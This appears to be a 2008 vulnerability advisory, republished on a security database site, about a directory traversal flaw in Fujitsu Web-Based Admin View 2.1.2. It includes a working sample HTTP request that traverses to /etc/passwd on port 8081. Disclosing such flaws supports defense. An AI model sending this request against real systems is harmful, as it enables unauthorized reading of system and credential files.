Fujitsu Web-Based Admin View Directory Traversal Vulnerability

2008.08.22
Credit: Deniz Cevik
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

Fujitsu Web-Based Admin View Directory Traversal Vulnerability Version: 2.1.2 on Solaris, Other versions may vulnerable Vulnerability: Directory Traversal Risk: Critical Description: Due to insufficient control of user inputs, Fujitsu Web-based admin view reveals content of files residing in folders other than webroot. This will allow an attacker to view arbitrary local files within the context of the web server. Sample Request: GET /.././.././.././.././.././.././.././.././.././etc/passwd HTTP/1.0 Host: target:8081 Deniz CEVIK www.intellectpro.com.tr

References:

http://seclists.org/fulldisclosure/2008/Aug/0411.html


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top